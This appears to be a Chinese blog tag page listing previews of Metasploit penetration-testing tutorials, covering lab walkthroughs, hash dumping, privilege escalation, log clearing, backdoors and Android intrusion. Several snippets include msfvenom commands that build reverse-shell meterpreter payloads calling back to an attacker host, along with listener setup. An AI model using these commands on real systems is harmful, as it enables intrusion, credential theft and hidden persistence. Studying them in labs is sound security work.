msf

2024/4/12 11:21:17
metasploit漏洞利用模块的简单使用

metasploit漏洞利用模块的简单使用

0x00:简介 exploits 是漏洞利用模块,漏洞利用是攻击者利用服务器的漏洞进行攻击的一种行为,其中包含了主流漏洞的攻击代码。 0x01:使用 以 metasploitable2 为例,刚开始,可以通过 nmap 来查看下靶机的一…
阅读更多...
看完这篇 教你玩转渗透测试靶机vulnhub——DC1

看完这篇 教你玩转渗透测试靶机vulnhub——DC1

Vulnhub靶机DC1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现:③:漏洞利用:④:SU…
阅读更多...
empire用法笔记

empire用法笔记

0x00:简介 empire 是一个针对内网针对域控的一个渗透测试框架,和 msf 类似。其中集成了很多内网的一些工具以及命令,使用方便,且 empire 生成的木马文件基于 powershell,所以在 windows 平台上有很好的免杀效果。结合…
阅读更多...
metasploit 简介

metasploit 简介

0x00:简介 metasploit 是一个开源框架,这个框架用来做渗透测试,其 msf 是由多个不同的模块组成的,在使用方面的话,可以在 kali 中直接使用,命令行 msfconsole 即可。 metasploit 会经常更新其中的一些模块…
阅读更多...
linux 系统使用 cymothoa 添加后门

linux 系统使用 cymothoa 添加后门

0x00:介绍 cymothoa 是一个后门工具,利用代码 shellcode 会被注入到进程中,只要进程存在,后门就会有效,所以一般选择一些自其服务的进程来注入,例如 web 服务 mysql,apache 等。其后门所拥有的…
阅读更多...
看完这篇 教你玩转渗透测试靶机——Metasploitable2

看完这篇 教你玩转渗透测试靶机——Metasploitable2

Metasploitable2渗透测试详解Metasploitable2靶机介绍:Metasploitable2靶机下载:Metasploitable2靶机安装:Metasploitable2靶机漏洞详解:Metasploitable2靶机渗透总结:Metasploitable2靶机介绍: Metasploi…
阅读更多...
msf 提权和清除日志

msf 提权和清除日志

0x00:介绍 在获取目标系统 shell 后,如果遇到了普通的 user 账户,则在后渗透阶段会有一些局限性,例如获取 hash,修改注册表,装软件等,所以会涉及到接下来的提权操作,由 guest 到 us…
阅读更多...
metasploit 辅助模块简单使用

metasploit 辅助模块简单使用

0x00:简介 metasploit 的 auxitiary 模块也就是辅助模块,可用来进行主机发现、端口扫描、服务发现、服务检测等。 0x01:使用 metasploit 包含了多个模块,每个模块下都有很多相应的脚本,这些脚本在使用的时候可以通过…
阅读更多...
msf 使用 hashdump 和 wce 提取 hash

msf 使用 hashdump 和 wce 提取 hash

0x00:介绍 msf 在获取 shell 后为了更方便的进行渗透测试,可获取主机的 hash 以及域的 hash,即用户的密码,存在于 c 盘下的 windos 下的 system32 下的 config 下的 sam 文件中,以 hash 加密的方式存储,而…
阅读更多...
msf拿到windows的shell显示乱码

msf拿到windows的shell显示乱码

msf拿到windows的shell显示乱码,使用chcp 65001解决
阅读更多...
msf 端口扫描

msf 端口扫描

0x00:介绍 msf 端口扫描可以通过两个方式实现,一个是调用 nmap 来扫描目标机的开放端口,一个是利用自带的端口扫描模块来进行扫描。nmap 扫描方式直接在 msf 中输入相应的 nmap 命令即可,msf 模块扫描方式需要调用 auxiliary 下的…
阅读更多...
mac安装msf的问题

mac安装msf的问题

参考国光大佬的博客《macOS 下优雅的使用 Metasploit》https://www.sqlsec.com/2019/11/macmsf.html 问题一:安装msf后无法初始化数据库失败 Creating database at /Users/lmc/.msf4/db Starting database at /Users/lmc/.msf4/db...failed Creating database use…
阅读更多...
使用Msfvenom生成Ubuntu 64位木马(反向连接、正向连接)

使用Msfvenom生成Ubuntu 64位木马(反向连接、正向连接)

环境 攻击机:Kali Linux 2020.1 172.16.252.129 靶机:Ubuntu 16.04 172.16.252.138 生成反向连接木马 使用kali自带的Msfvenom工具生成木马。 查看有哪些linux下的载荷: msfvenom -l payloads | grep linux针对Ubuntu 64位靶机&#xff…
阅读更多...
Centos7搭建MSF6(公网服务器搭建msf)

Centos7搭建MSF6(公网服务器搭建msf)

Centos7搭建MSF6(公网服务器搭建)文章非常详细简介1、安装msf2、卸载postgresql数据库3、安装postgresql数据库4、初始化数据库简介 每次需要用msf测试的时候,都需要用frp把msf穿透出来,麻烦的很,索性直接把他搭建到公…
阅读更多...
Linux(CentOS)安装msf

Linux(CentOS)安装msf

目录 一、安装MSF 1.1 在线安装 1.2 离线安装 二、安装Postgresql数据库 一、安装MSF 1.1 在线安装 需要挂梯子!挂完梯子需要reboot重启,多试几次就可以,国内网络我试了很久都不行。没条件没梯子的看1.2离线安装 cd /opt curl https://ra…
阅读更多...
MSF入侵安卓手机

MSF入侵安卓手机

MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。 我这里做测试的系统是Backbox linux ,这是一款网络渗透,信息…
阅读更多...
KALILINUX MSF中kiwi(mimikatz)模块的使用

KALILINUX MSF中kiwi(mimikatz)模块的使用

一、简介: kiwi模块:   mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。 二、前权: 提权到system权限: 1.1 提到system有…
阅读更多...
CS配合frp上线

CS配合frp上线

代理使用场景 1、拿下远程web服务器 2、webshell链接不稳定,需要使用稳定的木马程序 3、远程服务器无法直接链接攻击者电脑 4、需要借助公网vps转发来自失陷服务器的木马流量 5、借助frp服务端(vps)和客户端(内网攻击者)建立隧道 6、当vps某一个端口收到流量的…
阅读更多...
隧道应用2-netsh端口转发监听Meterpreter

隧道应用2-netsh端口转发监听Meterpreter

流程介绍: 跳板机 A 和目标靶机 B 是可以互相访问到的,在服务器 A 上可以通过配置 netsh 端口映射访问 B 服务器。如果要拿 B 服务器的权限通常是生成正向后门,使用 kali 的 msf 正向连接B服务器,进而得到 Meterpreter&#xff0c…
阅读更多...
Windows漏洞利用开发——利用SEH绕过GS保护

Windows漏洞利用开发——利用SEH绕过GS保护

实验6 Windows漏洞利用开发 6.1实验名称 Windows漏洞利用开发 6.2实验目的 学习windows漏洞利用开发,使用kali linux相关工具对windows内目标程序进行漏洞利用 6.3实验步骤及内容 第二阶段:利用SEH绕过GS保护 了解GS编译选项,SHE异常处…
阅读更多...
kali系列-msf生成马

kali系列-msf生成马

先生成exe , msfvenom -p/windows/meterpreter/reverse_tcp LHOST 你的主机 ip ,端口 记得谈诺填了靶机端口就会运行出错 2. 正常加载后 查看任务管理器 出现了 3.metasploit 出现反馈 权限不够 ,下面查看不了版本号 ,可以利用…
阅读更多...
【经验总结】CS与MSF之间的会话传递

【经验总结】CS与MSF之间的会话传递

0x00 前言 众所周知,Cobalt Strike 的前身是 Armitage,而 Armitage 又可以理解为 Metasploit Framework 的图形界面版,因此 Cobalt Strike 与 Metasploit Framework 在很多地方都是兼容的,所以我们便可以将 Metasploit Framework…
阅读更多...
基于MSF控制同一热点(局域网)下的其他设备

基于MSF控制同一热点(局域网)下的其他设备

主要是基于Metasploit,利于msfvenom生成的恶意软件获取目标shell。 我想各位都很熟悉的一个操作,那就是使用虚拟机当攻击机,本地物理机作为靶机,但这样其实并不能很好的反应出现实情况,有点自己攻击自己的感觉。 因此…
阅读更多...
Meterpreter session 2 closed. Reason: Died 问题解决方法

Meterpreter session 2 closed. Reason: Died 问题解决方法

问题描述 用msf生成Ubuntu 16.04的反向连接木马: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST172.16.252.129 LPORT1234 -f elf > shell.elf开启监听: msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_t…
阅读更多...
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-2

看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-2

Vulnhub靶机DriftingBlues-1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解:③:漏洞利用:④:反弹shell&#xf…
阅读更多...
MSF(Metasploit)渗透测试---黑客工具使用指南

MSF(Metasploit)渗透测试---黑客工具使用指南

Metasploit 简介 Metasploit 框架 渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部…
阅读更多...
msf利用Metasploitable 2 漏洞之6667端口之unreal_ircd_3281_backdoor

msf利用Metasploitable 2 漏洞之6667端口之unreal_ircd_3281_backdoor

Metasploitable漏洞演练系统 是Metasploit团队维护的一个集成了各种漏洞弱点的Linux主机(ubuntu)镜像,这方便大家对于msf的学,以下以6667端口的unreal_ircd_3281_backdoor进行攻击。 可以在虚拟机中启动(登录密码和账号都是msfadmin)查看其ip…
阅读更多...
windows/android后门的维持

windows/android后门的维持

搭建环境&#xff1a;kali linux,MSF windons后门维持 // 先创建一个后门payload msfvenom -p windows/meterpreter/reverse_tcp LHOST<your ip> LPORT4444 -f exe > /root/Desktop/windowsPayload.exe // 打开msf控制台&#xff0c;并完成相关设置 msfconsole use …
阅读更多...

Copyright @ 2022~2023